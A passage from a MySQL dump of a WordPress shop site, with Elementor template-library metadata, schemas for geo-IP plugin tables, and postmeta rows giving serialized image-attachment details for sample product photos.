Shop\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/12/XmasTreeThumb.png\";s:12:\"tmpl_created\";s:10:\"1514204382\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/christmas-tree-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"180\";s:16:\"popularity_index\";s:3:\"381\";s:11:\"trend_index\";s:3:\"503\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:610;a:14:{s:2:\"id\";s:4:\"3862\";s:5:\"title\";s:35:\"Christmas &#8211; Design Conference\";s:9:\"thumbnail\";s:63:\"https://library.elementor.com/wp-content/uploads/2017/12/q1.png\";s:12:\"tmpl_created\";s:10:\"1514206745\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/christmas-design-conference/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"181\";s:16:\"popularity_index\";s:3:\"356\";s:11:\"trend_index\";s:3:\"365\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:611;a:14:{s:2:\"id\";s:4:\"3777\";s:5:\"title\";s:39:\"Christmas &#8211; Snowboard Competition\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/12/cover-lib-v7.png\";s:12:\"tmpl_created\";s:10:\"1514205420\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/christmas-snowboard-competition/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"182\";s:16:\"popularity_index\";s:3:\"378\";s:11:\"trend_index\";s:3:\"410\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:612;a:14:{s:2:\"id\";s:3:\"420\";s:5:\"title\";s:11:\"Hero UI Kit\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2016/09/library-ui-kit-cover.png\";s:12:\"tmpl_created\";s:10:\"1475067229\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/hero-ui-kit/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"183\";s:16:\"popularity_index\";s:2:\"18\";s:11:\"trend_index\";s:2:\"40\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}}}','no');
/*!40000 ALTER TABLE `wpdp_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_plgsggeo_config`
--

DROP TABLE IF EXISTS `wpdp_plgsggeo_config`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_plgsggeo_config` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `var_name` char(255) NOT NULL,
  `var_value` longtext NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_plgsggeo_config`
--

LOCK TABLES `wpdp_plgsggeo_config` WRITE;
/*!40000 ALTER TABLE `wpdp_plgsggeo_config` DISABLE KEYS */;
INSERT INTO `wpdp_plgsggeo_config` (`id`, `var_name`, `var_value`) VALUES (1,'installation_date','2019-09-21'),(2,'custom_status','0');
/*!40000 ALTER TABLE `wpdp_plgsggeo_config` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_plgsggeo_ip`
--

DROP TABLE IF EXISTS `wpdp_plgsggeo_ip`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_plgsggeo_ip` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `ip_from` bigint(11) NOT NULL,
  `ip_till` bigint(11) NOT NULL,
  `country_code` char(2) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `ip_from` (`ip_from`,`ip_till`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_plgsggeo_ip`
--

LOCK TABLES `wpdp_plgsggeo_ip` WRITE;
/*!40000 ALTER TABLE `wpdp_plgsggeo_ip` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_plgsggeo_ip` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_plgsggeo_stats`
--

DROP TABLE IF EXISTS `wpdp_plgsggeo_stats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_plgsggeo_stats` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `time` int(11) NOT NULL,
  `ip` varchar(15) NOT NULL,
  `country_code` varchar(2) NOT NULL,
  `url` varchar(128) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_plgsggeo_stats`
--

LOCK TABLES `wpdp_plgsggeo_stats` WRITE;
/*!40000 ALTER TABLE `wpdp_plgsggeo_stats` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_plgsggeo_stats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_postmeta`
--

DROP TABLE IF EXISTS `wpdp_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=8952 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_postmeta`
--

LOCK TABLES `wpdp_postmeta` WRITE;
/*!40000 ALTER TABLE `wpdp_postmeta` DISABLE KEYS */;
INSERT INTO `wpdp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (1,2,'_wp_page_template','default'),(2,3,'_wp_page_template','default'),(6,6,'_customize_changeset_uuid','7218946d-3564-4b4a-a13b-de3d26ad318d'),(11,6,'_edit_lock','1571986488:1'),(12,6,'_edit_last','1'),(13,6,'_wp_page_template','template-frontpage.php'),(14,6,'_hide_page_title',''),(15,6,'_hide_header',''),(16,6,'_hide_footer',''),(17,6,'_hide_breadcrumb',''),(18,6,'_cover',''),(19,6,'_show_excerpt',''),(20,6,'_wc_apply_product',''),(403,1297,'_menu_item_menu_item_parent','0'),(402,1297,'_menu_item_type','custom'),(25,14,'_wp_attached_file','2018/12/onepress-plus-dummy-data.xml'),(26,15,'_wp_attached_file','2018/12/onepress-plus-config.json'),(27,29,'_wp_attached_file','2013/06/T_4_front1.jpg'),(28,29,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:22:\"2013/06/T_4_front1.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"T_4_front1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"T_4_front1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"T_4_front1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"T_4_front1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"T_4_front1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"T_4_front1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(29,29,'_wxr_import_parent','1232'),(30,38,'_wp_attached_file','2013/06/T_7_front.jpg'),(31,38,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:21:\"2013/06/T_7_front.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"T_7_front-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"T_7_front-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"T_7_front-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"T_7_front-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"T_7_front-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"T_7_front-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32,38,'_wxr_import_parent','1235'),(33,39,'_wp_attached_file','2013/06/T_7_back.jpg'),(34,39,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2013/06/T_7_back.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"T_7_back-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"T_7_back-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"T_7_back-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:20:\"T_7_back-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:20:\"T_7_back-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:20:\"T_7_back-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(35,39,'_wxr_import_parent','1235'),(36,43,'_wp_attached_file','2013/06/hoodie_7_front.jpg'),(37,43,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:26:\"2013/06/hoodie_7_front.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"hoodie_7_front-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"hoodie_7_front-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"hoodie_7_front-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"hoodie_7_front-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"hoodie_7_front-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"hoodie_7_front-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38,43,'_wxr_import_parent','40'),(39,44,'_wp_attached_file','2013/06/hoodie_7_back.jpg'),(40,44,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:25:\"2013/06/hoodie_7_back.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"hoodie_7_back-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"hoodie_7_back-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"hoodie_7_back-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"hoodie_7_back-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"hoodie_7_back-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"hoodie_7_back-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(41,44,'_wxr_import_parent','40'),(42,45,'_wp_attached_file','2013/06/hoodie_1_back.jpg'),(43,45,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:25:\"2013/06/hoodie_1_back.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"hoodie_1_back-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"hoodie_1_back-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"hoodie_1_back-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"hoodie_1_back-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"hoodie_1_back-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"hoodie_1_back-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(44,45,'_wxr_import_parent','40'),(45,46,'_wp_attached_file','2013/06/hoodie_1_front.jpg'),(46,46,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:26:\"2013/06/hoodie_1_front.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"hoodie_1_front-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"hoodie_1_front-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"hoodie_1_front-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"hoodie_1_front-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"hoodie_1_front-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"hoodie_1_front-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(47,46,'_wxr_import_parent','40'),(48,48,'_wp_attached_file','2013/06/hoodie_2_front.jpg'),(49,48,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:26:\"2013/06/hoodie_2_front.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"hoodie_2_front-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"hoodie_2_front-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"hoodie_2_front-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"hoodie_2_front-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"hoodie_2_front-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"hoodie_2_front-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(50,48,'_wxr_import_parent','47'),(51,16,'_edit_lock','1551778444:1'),(52,1218,'_wp_attached_file','2013/06/T_1_front.jpg'),(53,1218,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:21:\"2013/06/T_1_front.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"T_1_front-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"T_1_front-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"T_1_front-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"T_1_front-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"T_1_front-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"T_1_front-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(54,1218,'_wxr_import_parent','1230'),(55,1219,'_wp_attached_file','2013/06/T_1_back.jpg'),(56,1219,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:20:\"2013/06/T_1_back.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"T_1_back-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"T_1_back-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"T_1_back-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:20:\"T_1_back-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:20:\"T_1_back-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:20:\"T_1_back-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(57,1219,'_wxr_import_parent','1230'),(58,1220,'_wp_attached_file','2013/06/T_2_front.jpg'),(59,1220,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:21:\"2013/06/T_2_front.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"T_2_front-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"T_2_front-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"T_2_front-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"T_2_front-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"T_2_front-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"T_2_front-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"c